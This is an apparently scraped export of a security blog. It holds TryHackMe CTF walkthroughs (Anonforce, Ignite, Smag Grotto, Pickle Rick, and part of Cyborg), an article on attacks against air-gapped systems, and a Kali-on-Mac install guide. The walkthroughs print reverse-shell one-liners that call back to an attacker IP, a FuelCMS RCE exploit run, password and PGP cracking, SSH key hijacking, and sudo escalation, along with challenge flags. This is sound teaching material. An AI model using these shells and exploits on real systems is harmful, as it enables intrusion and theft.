+Ev6kFw3hr3uZeLcFH7HmSgeSah0\n4baXLdqx/oU1y2EWsMtgxvgvMv+7AV/pH8m3ii+Z2OHvGdYaA/oBpkj8A0tADwM7\nv2OQ3yKJL8S8Bbq0ImFub25mb3JjZS
A8bWVsb2RpYXNAYW5vbmZvcmNlLm5zYT6I\nXgQTEQgABgUCXVDlvQAKCRC5LNHygK2Cwu1gAP4ydadlQ8guYh1a8MearxuTj206\nNV+qu7R7/+W5oEjaOgD+O6Kd1DvwPNdtDoVCDwooio5w2jpy6QpRDouUB9FWjOW4\nzARdUOW9EAIAlJT+wJXzuF7ihlQrODb8gaXdCgNJtMI53Th0TUiM+OMduLy30ztB\nq7nlozzKkUSxzvMyyUvwVzvwR6OsqYzfOwH9FT1dYXKttDBFtoro4d4QcLYTcAVo\nbSnT1zp3SRmWge5bISyblr/c+lsgzV4/0gRIldYJz5tBC3oPEsocuaQozAIAiFTC\nO1wkD1KE1FI8dDpBmYAiH8It1YRN8WpjI/f40XZDIq7ulZEPfXh3u7wTFOKNn75B\nHPThCe2q0krcdZBmsIheBBgRCAAGBQJdUOW9AAoJELks0fKArYLCNqUBAJEvBOqO\nUm8ze0LI7MiExxECea560p1r7WmEbKuKBeOPAPoDWDbsWSZpUq7Qj9CWla/vkGUs\n3ELdayAA8xm2L+QD7Q==\n=Wwny\n— — -END PGP PRIVATE KEY BLOCK — — -\nCracking the PGP Key:Convert backup.pgp for John the Ripper:\ngpg2john backup.pgpOutput is gibberish, so we try private.asc:\ngpg2john private.ascCopy the output string:\n$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968\nSave it in a file:\nnano jijTo confirm, cat the file and check that the content is there:\ncat jij$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968\nNow to crack it, use John the Ripper with the RockYou wordlist:\njohn jij --wordlist=/usr/share/wordlists/rockyou.txtFound password: xbox360\nImport the private key:\ngpg --import private.ascEnter password: xbox360\nDecrypt the backup file:\ngpg --decrypt backup.pgpOutput contains the root password hash:\nroot:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::\nCracking the Root Password:Copy the root password hash:\n$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0\nSave it to a file (here named anonforcethm) and run John the Ripper:\njohn anonforcethm --wordlist=/usr/share/wordlists/rockyou.txtPassword found: hikari\nRoot 
Access:Connect using SSH:\nssh root@10.10.60.146password: hikari\nls -lacat root.txtFlag: f706456440c7af4187810c31c6cebdceCONCLUSION :I hope this write-up walkthrough was helpful to you all! This room covered FTP Enumeration, Cracking PGP Keys, Password Hash Cracking, and SSH Privilege Escalation. It was an interesting challenge that required a mix of forensic decryption and brute force techniques to gain root access.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"4 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/anonforce-tryhackme--ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Anonforce — TryHackMe —   CTF Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ignite” IGNITE— TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ignite”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. 
While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a Fuel CMS page.\nI also initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.14.59 --openferoxbuster -u http://10.10.14.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtOn the website, we also notice a user ID and password mentioned in the login section.\nFrom the Feroxbuster results, we find the paths /fuel and /fuel/module\nNext, checking the version, we confirm it is FuelCMS, which has a known exploit for Remote Code Execution (RCE).\nSearching for an exploit in ExploitDB, we see it:\nNow back in the terminal I use searchsploit:\nsearchsploit fuel cmsWe locate the exploit script:\nlocate php/webapps/50477.pyCopy it into our working directory and inspect it:\ncp /usr/share/exploitdb/exploits/php/webapps/50477.py .cat 50477.pyWe modify the script’s target IP (make sure it is the victim’s IP) and execute:\npython3 50477.py -u http://10.10.14.59/Once in, we confirm RCE access by running:\nwhoamipwdls -laNow that we are in, I want a proper reverse shell, so I open the listener:\nnc -lvnp 1234Now the reverse shell payload:\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 10.4.1.240 1234 \u0026gt;/tmp/f{Replace 10.4.1.240 with our system IP and 1234 with the port used in Netcat}\nOnce the shell connects, we navigate through directories:\ncd /homels -lacd www-datals -lacat flag.txtThat helps us retrieve the user flag:\n6470e394cbf6dab6a91682cc8585059bPrivilege EscalationLooking at the FuelCMS structure, we check for database configuration files:\ncd /var/www/html/fuel/application/config/ls -lacat database.php$ cat database.php\n\u0026lt;?php\ndefined('BASEPATH') OR exit('No direct script access allowed');\n*/\n$active_group = 'default';\n$query_builder = TRUE;\n$db['default'] = array(\n'dsn' =\u0026gt; '',\n'hostname' =\u0026gt; 'localhost',\n'username' 
=\u0026gt; 'root',\n'password' =\u0026gt; 'mememe',\n'database' =\u0026gt; 'fuel_schema',\n'dbdriver' =\u0026gt; 'mysqli',\n'dbprefix' =\u0026gt; '',\n'pconnect' =\u0026gt; FALSE,\n'db_debug' =\u0026gt; (ENVIRONMENT !== 'production'),\n'cache_on' =\u0026gt; FALSE,\n'cachedir' =\u0026gt; '',\n'stricton' =\u0026gt; FALSE,\n'failover' =\u0026gt; array(),\n'save_queries' =\u0026gt; TRUE\n);\n// used for testing purposes\nif (defined('TESTING'))\n{\n@include(TESTER_PATH.'config/tester_database'.EXT);\n}\nWe find credentials:\nUsername: rootPassword: mememeWhen we try su root, we get an error:\nsu rootsu: must be run from a terminal\nTo get around this, we spawn a fully interactive TTY shell:\npython -c 'import pty;pty.spawn(\"/bin/bash\")'Now, we switch to root using the credentials found:\nsu rootmememe (password)cd /rootls -lacat root.txtb9bbcb33e11b80be759c4e844862482dCONCLUSION:I hope this write-up walkthrough was helpful to you all! This room covered:\nWeb Enumeration (Feroxbuster, CMS identification)Remote Code Execution (FuelCMS exploit)Reverse Shells (Netcat, interactive TTY)Privilege Escalation (Database credentials \u0026amp; LinPEAS)Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"29 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ignite-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"IGNITE— TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “SMAG GROTTO.” SMAG GROTTO — TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “SMAG GROTTO.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a web-page.\nI then initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.6.30 --open -sV -OAt http://10.10.6.30/mail/ we find a PCAP file. Opening it in Wireshark, we filter for HTTP POST requests.\nRight-click on the request → Follow HTTP StreamWe find credentials:Username: helpdeskPassword: cH4nG3M3_n0wWe also discover the subdomain developments.smag.thmNext, we edit the /etc/hosts file to resolve this subdomain:\nsudo nano /etc/hostsAdd this line:\n10.10.6.30 developments.smag.thmWe save the file and open http://developments.smag.thm in the browser.\nNext, we navigate to /login.php and enter the username \u0026amp; password:\nUsername: helpdeskPassword: cH4nG3M3_n0wInside, we try executing commands, but it doesn’t work. 
So, we set up a reverse shell.\nOpen a Netcat listener on our machine in a new terminal tab:\nnc -lvnp 1234Execute the reverse shell payload:\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 10.4.1.240 1234 \u0026gt;/tmp/f{Replace 10.4.1.240 with our system IP/VPN IP and 1234 with our chosen port}\nOnce we get a shell, we upgrade it to an interactive TTY:\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'We now have access as www-data.\nFinding SSH Key for Privilege Escalation:We attempt to read user.txt, but it's restricted.\nChecking the crontab, we find a reference to an RSA key backup:\ncat /etc/crontabNavigating to the backup folder:\ncd /opt/.backupsls -lacat jake_id_rsa.pub.backupWe decide to replace the SSH key with our own.\nGenerating \u0026amp; Injecting an SSH Key:On our local machine, we generate an SSH key:\nssh-keygen -t rsaFilename: jakethmNo passphraseCopy the public key:\ncat jakethm.pubIt outputs something like this: ssh-rsa AAAAB3… root@kali\nReplace the existing key on the target machine:\necho \"ssh-rsa AAAAB3… root@kali\" \u0026gt; jake_id_rsa.pub.backupOnce the cron job copies the backup into place, our key is the one used for authentication.\nNow, we navigate to Jake’s home directory:\ncd /home/jakewhoamiWe are still www-data, so we attempt SSH access.\nLogging in as Jake via SSH:On our local machine, we use our private key to SSH into Jake’s account:\nssh -i jakethm jake@10.10.6.30Once inside:\npwdcd /homecat user.txtWe successfully retrieve user.txt:\niusGorV7EbmxM5AuIe2w499msaSuqU3jNext, checking sudo privileges:\nsudo -lWe see that apt-get can be run as root.\nUsing GTFOBins: https://gtfobins.github.io/gtfobins/apt-get/#sudo , we find an exploit for apt-get:\nsudo apt-get update -o APT::Update::Pre-Invoke::=/bin/shThis grants us a root shell!\nNow, we retrieve the final flag:\ncd /rootcat root.txtuJr6zRgetaniyHVRqqL58uRasybBKz2TCONCLUSIONI hope this write-up walkthrough was helpful to you all! 
This room covered:\nNmap \u0026amp; Feroxbuster (Port scanning \u0026amp; directory enumeration)PCAP Analysis (Extracting credentials from HTTP requests)Reverse Shells (Netcat, TTY upgrade)SSH Key Injection (Hijacking an existing user’s key)Privilege Escalation (Exploiting apt-get via GTFOBins)Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"27 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/smag-grotto-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SMAG GROTTO — TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Pickle Rick.” PICKLE RICK — TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Pickle Rick.”\nThis room was a very fun room and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. 
While it’s booting up, go ahead and open your terminal tab and get it ready.\nWe start with an Nmap scan to check open ports:\nnmap 10.10.137.72 --openThen I run Feroxbuster to find hidden directories:\nferoxbuster -u http://10.10.137.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThen to the webpage:\nFrom the Feroxbuster scan, I see there is a login.php page but I have no credentials; apart from this there are also /assets and robots.txt.\nI then inspect the page and see a username.\nOn checking robots.txt, I find a password-like string.\nAnd, inspecting the page at portals.php, I see this:\nThen I head over to login.php and try using the found credentials.\nOnce I’m successfully logged in, I look through, but there are no direct options to retrieve a flag.\nThen I inspect the page source → Base64 encoded text found\nDecoding the Base64 → No useful information\nThen I see there is a Command Execution Panel that allows us to run system commands.\nTesting simple Linux commands like ls, pwd, and whoami works, meaning Remote Code Execution (RCE) is possible.\nThis is the key, and I suggest that all of you refer to this repo: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\nSo I set up a reverse shell:\nrm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2\u0026gt;\u0026amp;1 | nc 10.4.1.240 1234 \u0026gt;/tmp/f{Replace 10.4.1.240 with your system IP, and 1234 with your listening port}\nBack in the terminal, open a Netcat listener in another tab:\nnc -lvnp 1234That did not work, so I changed the reverse shell and used this:\nperl -e 'use Socket;$i=\"10.4.1.240\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u0026gt;\u0026amp;S\");open(STDOUT,\"\u0026gt;\u0026amp;S\");open(STDERR,\"\u0026gt;\u0026amp;S\");exec(\"/bin/sh -i\");};'Now when you execute this in the panel, the listener catches it and we gain shell access.\nNow 
that we are in:\ncat Sup3rS3cretPickl3Ingred.txt\nFind the second ingredient in the /home directory, but it doesn’t open.\nRealize the filename has a space:\ncat \"second ingredients\"\nThen check sudo permissions by:\nsudo -l\nIt shows ALL permissions, meaning we can escalate easily:\nsudo su\nNavigate to /root and get the final flag:\ncat 3rd.txt\nFlag 1: mr. meeseek hair\nFlag 2: 1 jerry tear\nFlag 3: fleeb juice\nConclusion\nI hope this write-up walkthrough was helpful to you all! This room covered Web Enumeration, RCE Exploitation, Reverse Shells, and Privilege Escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup\n","date":"22 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/pickle-rick-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"PICKLE RICK — TRY HACK ME-ROOM","type":"writeups"},{"content":" In cybersecurity, few ideas have the same mythic aura as the “air gap.” Air-Gapped Systems in 2025: Secure by Design or Security Theater?\nAIR GAPPED SYSTEMS\nIn cybersecurity, few ideas have the same mythic aura as the “air gap.”\nA system physically disconnected from any network — no internet, no LAN, no wireless, no cloud — the digital equivalent of sealing secrets in a lead-lined vault.\nWe believe these systems are safe, protected from threats that exist in the outside world. But is isolation enough to ensure complete security?\nTo start it off I want to share one of my favorite stories:\nThe late Jeremiah Denton, a U.S. 
naval aviator and former senator, became a symbol of resilience and resourcefulness during the Vietnam War.\nThe late Jeremiah Denton: The A-6 Intruder pilot on the left and U.S. Senator on the right.In 1965, Denton was leading a bombing mission over North Vietnam in his A-6 Intruder when his aircraft was struck by a bomb from his own squadron.\nForced to eject (shoutout to Martin-Baker, obviously), Denton and his crew were captured and held as prisoners of war for nearly eight years.\nDuring his captivity, Denton was part of a press conference with other American POWs.\nThe enemy tried to use him for propaganda, but Denton had other plans.\nJeremiah Denton spelling Torture through BlinkingUnder duress, he blinked out the word “TORTURE” in Morse code, sending crucial information to the outside world about the prisoners’ conditions — all while being completely isolated from any external help.\nNow how does this associate with my Air Gaps you wonder?\nIt follows a simple law that I always believe in: it shows that even in the most isolated environments, information can still be moved in \u0026amp; out.\nIn this case through clever Morse code or something more subtle. Just like Denton found a way to communicate despite his confinement, attackers have found ways to bypass the isolation of air-gapped systems.\nWhat Exactly Is an Air-Gapped System?For those who know — and for those who have no idea — here’s the deal with air-gapped systems.\nNo Ethernet or Wi-Fi connectivityNo Bluetooth or wireless peripheralsNo external access unless explicitly controlled (e.g. 
via removable media)Used extensively in military, critical infrastructure, nuclear plants, and high-value corporate R\u0026amp;D, these systems are considered high-assurance environments.\nBut here’s the problem: air-gapped ≠ attack-proof.\nTom Cruise beat us to it — air-gapped computer infiltration, Mission: Impossible style.Let’s break down how attackers bypass these “unbreachable” defenses — and why relying solely on air-gapping in 2025 is no longer enough.\nStuxnet: The First Big Wake-Up CallThe infamous Stuxnet: The cyber weapon to successfully breach and disrupt air-gapped nuclear systemsLet’s rewind to 2010, the year Stuxnet changed everything.\nIn 2010, global tensions were rising over Iran’s nuclear program.\nWestern intelligence agencies feared Iran was moving closer to developing a nuclear weapon, despite international sanctions and diplomacy.\nBehind the scenes, a new kind of weapon was already in play.\nStuxnet was the first publicly known malware to successfully target air-gapped systems — specifically, Iranian centrifuges used in nuclear enrichment.\nHow Stuxnet workedIt didn’t spread over the internet. It didn’t rely on phishing emails.Instead, it hitched a ride — on a simple USB flash drive.\nOnce inside Iran’s Natanz nuclear facility, the malware moved with surgical precision. 
It exploited four zero-day vulnerabilities, carried legitimate digital certificates to avoid detection, and wormed its way deep into isolated networks that weren’t supposed to be reachable.\nBut it didn’t stop at spying.\nStuxnet took control of the centrifuges used to enrich uranium, subtly manipulating their stepper motors — speeding them up, slowing them down — until the machines began to fail.\nAnd all the while, it fed false readings back to operators, making everything look normal.\nThe attack proved a sobering truth: air-gaps may block signals, but they don’t block people.\nNow, 2010 feels like a lifetime ago.\nThe world has changed, tech has evolved — and honestly, back then, I was just a kid with no clue how a computer even worked.\nProbably wandering through school, not paying attention in class, and definitely not imagining myself sitting in front of a screen writing about cybersecurity.\nYet here we are.\nAnd just like I’ve grown — and I’m sure you’ve all leveled up too, whether it’s in your careers or just in binge-watching skills — the threats have evolved as well.\nRAMBO — 2023 Proof-of-Concept for Magnetic ExfiltrationIn 2023, RAMBO took the cybersecurity world by surprise, exposing a new vulnerability in air-gapped systems.\nWhile past attacks like Stuxnet relied on USB drives, RAMBO proved that magnetic fields from RAM chips themselves could be exploited to leak data.\nHow it worksHere’s how it works:\nWhen a computer’s RAM undergoes intense read/write operations, it emits faint magnetic signals.\nMalware can then manipulate this activity to encode binary data into these magnetic waves.\nThis is the epitome of stealth in my eyes\nWhat makes this attack so stealthy?\nYou don’t need anything complex — just a smartphone with a magnetometer (which, by the way, most smartphones have these days).\nIf the phone is placed about 5–10 cm away from the system, it can pick up these magnetic signals and decode the hidden data.\nNo external devices, no extra 
software, no drivers required — just a script in the RAM and a phone quietly listening.\nThe exfiltration rate is slow — just a few bits per second. But that’s still enough to leak critical information, like encryption keys, credentials, or command instructions, all without triggering any alarms.\nAs if that wasn’t enough, in 2024 came the Golden Jackal.\nGolden JackalThe Final BossA new threat emerges — Golden Jackal, an advanced persistent threat (APT) group, quietly infiltrating diplomatic and government systems across Asia and Europe, including air-gapped environments.\nBut this wasn’t a loud, aggressive attack. It was surgical, slow, and devastatingly effective.\nThe Attack Flow:\nAttack Flow of the Golden USB \u0026amp; DealerGolden Jackal started on internet-connected machines, often the outer layer of a secure network. The group didn’t rush in; they waited patiently.\nThey kept a watchful eye for any USB insertions. The moment they spotted one, they loaded a stealthy payload onto the drive.\nThe tools involved — such as Golden Dealer , Golden USB Copy and Jackal Screen Watcher — were designed for stealth, modularity, and adaptability.\nThat USB would eventually make its way to an air-gapped system.\nOnce inserted, the malware silently executed within the secure environment, bypassing all security measures.\nGolden UsbCopy \u0026amp; Golden DealerWhat followed was even more insidious:Sensitive data, like documents, encryption keys, and certificates, were harvested and quietly stored on the USB.\nAnd once that USB was reconnected to a networked device, the data was exfiltrated — automatically.\nNo obvious signs of suspicious activity.\nNo beaconing to command and control servers. 
Just silent persistence.\nThis primarily targeted diplomatic and government systems in Asia and Europe, affecting critical infrastructures and highly sensitive data.\nThe group’s stealthy and persistent methods led to multiple breaches in air-gapped systems, which were previously considered immune to remote attacks.\nThe impact was felt across several sectors, from foreign ministries to military agencies, as the group quietly exfiltrated confidential documents, encryption keys, and internal communications.\nDespite the low-and-slow nature of the attack, data exfiltration rates were consistent.\nThis data remained undetected for months, raising alarms about the true scale of the breach.\nWhen Silence Speaks — Proximity AttacksOkay, but what if you block USBs?\nWhat if your air-gapped system is in a sealed room, with no access points and strict access control?\nWhat if it’s truly offline?\nI hate to break it to you but- You’re still not safe.\nEnter Side-Channel and Proximity Attacks\nHow Side-Channel attack worksOver the past decade, researchers have demonstrated how attackers can exfiltrate data from air-gapped systems using these sneaky methods:\nAcoustic signals (MOSQUITO, Fansmitter): Using speakers or fans that emit high-frequency tones undetectable by the human ear, attackers can capture these with nearby microphones.LED signals (xLED, LED-it-GO): Status lights blinking in binary patterns, which can be captured by cameras from a distance.Electromagnetic radiation (AirHopper, GSMem): Components like RAM and video cards emit electromagnetic fields that can be intercepted using antennas or radios.Defending the Modern Air GapCheyenne Mountain Complex, backup command CentreAir-gapped systems are far from obsolete — they remain critical in high-assurance environments like military operations, critical infrastructure, and sensitive R\u0026amp;D.\nBut to stay secure in 2025, we must treat them as soft targets with hard shells\nSome Controls are:\nDisable autorun and 
enforce strong USB media policies to prevent automatic execution of malware.\nUse hardware-enforced data diodes for one-way data transfer, ensuring no two-way communication can occur\nPhysically isolate systems in RF- and EM-shielded enclosures to block unwanted electromagnetic emissions\nBan smartphones and smart devices from proximity to air-gapped systems. They’re Trojan horses waiting to happen\nMonitor and log user activity, even for offline systems, to detect any unusual behavior\nAnd last, Educate users that “offline” does not mean “immune” — the human element is often the weakest link\nConclusionAir-gapped control rooms: isolated by design, critical by functionThe air gap is not dead — far from it.\nBut in 2025, it requires more than just physical isolation to stay secure.\nAs we’ve seen from attacks like Stuxnet, Golden Jackal, and RAMBO, no system, no matter how isolated, is truly safe.\nWith the rise of proximity and side-channel attacks, defending air-gapped environments demands vigilance, layered defenses, and a deep understanding that the real threat might be closer — and quieter — than we realize.\nDefending air-gapped systems means thinking beyond the cable.It means treating them not as impenetrable vaults, but as glass houses, vulnerable to even the faintest ripple.\nI personally believe, silence doesn’t mean safety — it might just mean we haven’t learned how to listen yet.\nSo ask yourself:Are we truly disconnected — or just blind to the ways we’re still exposed?\nReferenceshttps://www.sentinelone.com/cybersecurity-101/cybersecurity/what-is-an-air-gap/https://www.f5.com/labs/articles/cisotociso/attacking-air-gap-segregated-computershttps://news.ycombinator.com/item?id=17099969https://www.bleepingcomputer.com/news/security/european-govt-air-gapped-systems-breached-using-custom-malware/https://thehackernews.com/2024/10/goldenjackal-target-embassies-and-air.html ","date":"20 April 
2025","externalUrl":null,"permalink":"/articles/security-research-articles/air-gapped-systems-in-2025-secure-by-design-or-security-theater/","section":"Security Research \u0026 Articles","summary":"","title":"Air-Gapped Systems in 2025: Secure by Design or Security Theater?","type":"articles"},{"content":"","date":"20 April 2025","externalUrl":null,"permalink":"/articles/security-research-articles/","section":"Security Research \u0026 Articles","summary":"","title":"Security Research","type":"articles"},{"content":" Why this Guide: How to Install Kali Linux on macOS (Apple Silicon) Using VMware Fusion — Step-by-Step GuideWhy this Guide:This is a different kind of write-up than I usually post here, but I figured I’d share it because it might save someone else the head-scratching I went through.\nI recently had to download and set up Kali Linux — but doing it on a Mac (especially being new to the environment) turned out to be a bit more confusing.\nI tried a few options. UTM was okay, but in the end, VMware Fusion gave me better performance and flexibility.\nSo here’s a clean, step-by-step walkthrough I put together to help you set up Kali Linux on a Mac using VMware Fusion, without the confusion.\n⚠️ Quick DisclaimerI know some folks prefer using other setups — like dedicated Linux boxes, cloud machines, or tools like Parallels instead of VMware.\nAnd that’s totally valid.\nThis writeup is just based on my personal preference and current workflow using a Mac with Apple Silicon.\nI found VMware Fusion to be smoother and more responsive than UTM, and figured it was worth documenting. 
But you should absolutely use whatever works best and feels comfortable for you!\nWhat You’ll Need:A Mac with an M1, M2, M3, M4 chip (Apple Silicon)Stable Internet connection25–40 GB free space20–30 minutes of time(Optional) anything to snack onStep 1: Download Kali Linux ISOHead to the official Kali Linux website:\nhttps://www.kali.org/get-kali/#kali-platformsScroll to Installer Images\nDirect link to Installer ImagesUnder “Apple Silicon (ARM64)”, click Download under the recommended installer.\nThis ISO is designed to run on Macs with Apple Silicon, so don’t download the regular x64 version — it won’t work.\nStep 2: Download VMware FusionVMware Fusion is now free for personal use. But since VMware is owned by Broadcom, you’ll need to register to download it.\nFirst, read the announcement here (optional ): VMware Fusion Now FreeThen head to the download page: Download VMware FusionCreate a Broadcom account (or log in if you already have one)\nAccept the terms, verify your email, and you’ll get access to the downloads.\nChoose the Apple Silicon version, and click Download.\nOnce it’s downloaded, double-click the .dmg file to install VMware Fusion.\nStep 3: Set Up Your Kali Virtual MachineOpen VMware Fusion from Applications.\nChoose: “Install from disc or image”\nDrag and drop the Kali ISO, or click to browse and select it.\nFor OS type:\nChoose LinuxVersion: Debian 12 (since Kali is based on Debian)Click Customize Settings, and name your VM something like Kali_VM.\nNext click on processor and memory and set it at 4096 and you can leave at 2 cores or 4 cores based on system\nThen click back on show all and navigate to hard disk and set it as 45 or 50 gb\nThen click back on show all and close it and then click on the play button icon\nMemory (RAM): 4096 MB (4GB)CPU Cores: 2 or 4 depending on your MacDisk Size: 45–50 GBStep 4: Install Kali Linux (Graphical Installer)On the boot menu, use arrow keys to select Graphical install → press EnterFollow the steps:Language → 
English (or your preference)\nRegion → for timezone\nKeyboard → e.g. US\nSet the system info:\nHostname → kali\nDomain name → leave empty\nFull name → anything you like\nUsername → your choice\nPassword → strong one that you’ll remember lol\nNext,\nDisk setup:\nUse Guided — use entire disk\nSelect All files in one partition\nChoose Yes when asked to write changes\nLet the install finish (it might take a few minutes)\nChoose default software options, then install GRUB when prompted.\nHit Continue to reboot once everything’s done.\nStep 5: Boot into Kali \u0026 Enjoy\nAfter rebooting, you’ll see the Kali login screen.\nLogin with the username and password you set\nBoom! You’re in Kali on your Mac 🎉\nMake sure you hit the terminal and run (refresh the package index first, then upgrade):\nsudo apt update\nsudo apt upgrade\nCONCLUSION\nI hope this write-up walkthrough was helpful to you all!\nThis one was a bit different from my usual CTF or pwn box writeups, but I wanted to clearly lay out the process of setting up Kali Linux on macOS using VMware Fusion — especially since things can be tricky when you’re new to the Mac environment or dealing with Apple Silicon.\nNow that I’ve gotten through it, I hope it helps you and gets you running with a working Kali box too.\nIf you guys want me to cover any specific setup, tool, or challenge, or if you have any questions, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"15 April 2025","externalUrl":null,"permalink":"/articles/technisch/how-to-install-kali-linux-on-macos-apple-silicon-using-vmware-fusion-step-by-step-guide/","section":"Security Research \u0026 Articles","summary":"","title":"How to Install Kali Linux on macOS (Apple Silicon) Using VMware Fusion — Step-by-Step Guide","type":"articles"},{"content":" Hello everyone! 
This is an easy room from the TryHackMe platform called “CYBORG”. CYBORG — THM — WRITEUP\nHello everyone! This is an easy room from the TryHackMe platform called “CYBORG”.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThe people who read my walkthrough\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s paste the IP address and connect to the network. This is what we have in front of us: a default Apache page.\nIn the terminal, run Nmap to check for open ports:\nnmap 10.10.128.43 --open\nThen I find:\nPort 22 (SSH) is open\nPort 80 (HTTP) is open\nThen I run Feroxbuster to find hidden directories:\nferoxbuster -u http://10.10.128.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\nThen I find:\n/admin\n/etc\nI then visit /admin and I see:\nIt contains conversations between users.\nMentions Squid Proxy and backup music_archive.\nDropdown downloads archive.tar (we will analyze this later).\nNext I visit /etc and /etc/squid.\nFound passwd file: music_archive:\nI then copy this hash and go back to my terminal.\nI create a file and paste the hash in it:\ngedit cc.txt\nThen I run the legendary combination “john the ripper + rockyou.txt”:\njohn cc.txt --wordlist=/usr/share/wordlists/rockyou.txt\nBy doing this I get the password:\nCracked password: squidward\nNow going to the backup file, it is in the format of Borg Backup.\nI go online and search it up and see a few pages:\nNow in the terminal I perform the installation first:\nsudo apt update \u0026\u0026 sudo apt install borgbackup\nMove to the folder where archive.tar is downloaded.\nExtract the archive.tar:\ntar xf archive.tar\nNavigate through directories:\nls\ncd home\nls\ncd 
